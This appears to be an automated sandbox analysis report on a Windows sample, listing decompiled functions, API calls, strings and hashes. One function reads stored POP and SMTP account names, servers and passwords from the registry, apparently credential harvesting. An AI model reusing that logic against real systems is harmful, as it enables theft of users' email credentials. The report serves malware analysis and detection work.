free.MSVCRT(00000000,00000000,Mxt,00406B49,00000001,?,00000000,Mxt,00406D88,00000000,?,?), ref: 00406137

Strings

Mxt, xrefs: 004060FA

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: freemallocmemcpy
String ID: Mxt
API String ID: 3056473165-3818084670
Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798

Uniqueness

Uniqueness Score: -1.00%

Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}

0x00411932
0x00411939
0x0041193b
0x0041193c
0x00411941
0x00411942
0x00411949
0x0041194b
0x0041194c
0x00411951
0x00411952
0x00411959
0x0041195b
0x0041195c
0x00411961
0x00411962
0x00411969
0x0041196b
0x0041196c
0x00000000
0x00411971
0x00411972

APIs

??3@YAXPAX@Z.MSVCRT ref: 0041193C
??3@YAXPAX@Z.MSVCRT ref: 0041194C
??3@YAXPAX@Z.MSVCRT ref: 0041195C
??3@YAXPAX@Z.MSVCRT ref: 0041196C

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C

Uniqueness

Uniqueness Score: -1.00%

Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}

0x0040787d
0x00407884
0x0040788b
0x0040788c
0x00407891
0x0040789b
0x004078a5
0x004078aa
0x004078b8
0x004078b9
0x004078c2
0x004078c3
0x004078c8
0x004078d6
0x004078d7
0x004078e0
0x004078e1
0x004078e6
0x004078ec
0x004078f1
0x004078f9
0x00000000
0x004078f9
0x004078fe

APIs

??2@YAPAXI@Z.MSVCRT ref: 004078A5
??2@YAPAXI@Z.MSVCRT ref: 004078C3
??2@YAPAXI@Z.MSVCRT ref: 004078E1
??2@YAPAXI@Z.MSVCRT ref: 004078F1

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}

0x0040b8d7
0x0040b8d7
0x0040b8e0
0x0040b8e4
0x0040b8f5
0x0040b8fb
0x0040b900
0x0040b909
0x0040b920
0x0040b90b
0x0040b90e
0x0040b91a
0x0040b91a
0x0040b910
0x0040b915
0x0040b915
0x0040b91c
0x0040b91c
0x0040b925
0x0040b926
0x0040b92b
0x0040b934
0x0040b940
0x0040b942
0x0040b944
0x00000000
0x00000000
0x00000000
0x0040b936
0x0040b938
0x0040b946
0x0040b949
0x0040b950
0x0040b955
0x0040b95f
0x0040b976
0x0040b961
0x0040b961
0x0040b965
0x0040b972
0x0040b967
0x0040b96d
0x0040b96d
0x0040b965
0x0040b98b
0x0040b998
0x0040b9a1
0x0040b9a2
0x0040b9a8
0x0040b9ac
0x0040b9ac

APIs

Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28

_stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B

Strings

/stext, xrefs: 0040B926

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$_stricmpmemset
String ID: /stext
API String ID: 3575250601-3817206916
Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD

Uniqueness

Uniqueness Score: -1.00%

Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}

0x00406264
0x00406270
0x00406277

APIs

Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB

CreateFontIndirectA.GDI32(?), ref: 00406270

Strings

Arial, xrefs: 0040625C

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFontIndirectmemsetstrcpy
String ID: Arial
API String ID: 3275230829-493054409
Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9

Uniqueness

Uniqueness Score: -1.00%

Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}

0x004047a0
0x004047a2
0x004047a8
0x004047b0
0x004047b6
0x004047c0
0x004047c8
0x004047ce
0x004047d0
0x004047d0
0x004047ce
0x004047db
0x004047e4
0x004047e8
0x004047e8
0x004047f0

APIs

Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806

LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32 ref: 0040EB35

Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55

Uniqueness

Uniqueness Score: -1.00%

Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}

0x004047f1
0x004047f9
0x004047ff
0x00404803
0x00404806
0x0040480c
0x0040480c
0x00404810

APIs

FreeLibrary.KERNELBASE(?,?), ref: 00404806

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x00405ef6
0x00405efc

APIs

CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24

Uniqueness

Uniqueness Score: -1.00%

Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}

0x0040e894
0x0040e897
0x0040e89d
0x0040e8a0
0x0040e8a6
0x00000000
0x0040e8a6
0x0040e8aa

APIs

FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}

0x0040eda0
0x0040eda9

APIs

EnumResourceNamesA.KERNEL32 ref: 0040EDA0

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}

0x00406f5b
0x00406f62
0x00406f65
0x00406f6b
0x00000000
0x00406f6b
0x00406f6e

APIs

FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04

Uniqueness

Uniqueness Score: -1.00%

Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x0040614f
0x0040615f

APIs

GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}

0x0040eb52
0x0040eb58

APIs

RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}

0x00402d9a
0x00402d9a
0x00402d9a
0x00402dad
0x00402db7
0x00402dc0
0x00402dc7
0x00402dca
0x00402dcd
0x00402dd8
0x00402ddf
0x00402de0
0x00402de6
0x00402df2
0x00402df3
0x00402df8
0x00402dfb
0x00402e07
0x00402e0a
0x00402e14
0x00402e2a
0x00402e40
0x00402e56
0x00402e67
0x00402e78
0x00402e9d
0x00402e9f
0x00402e9f
0x00402eb1
0x00402ec4
0x00402eda
0x00402ef0
0x00402f04
0x00402f18
0x00402f3d
0x00402f3f
0x00402f3f
0x00402f43
0x00402f51
0x00402f5e
0x00402f63
0x00402f6c
0x00402f74
0x00402f74
0x00402f80
0x00402f89
0x00402f89
0x00402f8e
0x00402f93
0x00402f9b
0x00402f9b
0x00402fa7
0x00402fb0
0x00402fb0
0x00000000
0x00402fb8
0x00402fbf

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

strcpy.MSVCRT(?,?), ref: 00402EB1
strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
strcpy.MSVCRT(?,?), ref: 00402F51
strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
RegCloseKey.ADVAPI32(?), ref: 00402FB8

Strings

SMTPLogSecure, xrefs: 00402F10
PopServer, xrefs: 00402E4C
PopPort, xrefs: 00402E5F
PopLogSecure, xrefs: 00402E70
PopAccount, xrefs: 00402E36
DisplayName, xrefs: 00402DF3
SMTPPort, xrefs: 00402EFC
EmailAddress, xrefs: 00402E20
SMTPServer, xrefs: 00402EE6
SMTPPassword, xrefs: 00402F2B
SMTPAccount, xrefs: 00402ED0
PopPassword, xrefs: 00402E8B

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$QueryValue$CloseOpen
String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
API String ID: 4127491968-1534328989
Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
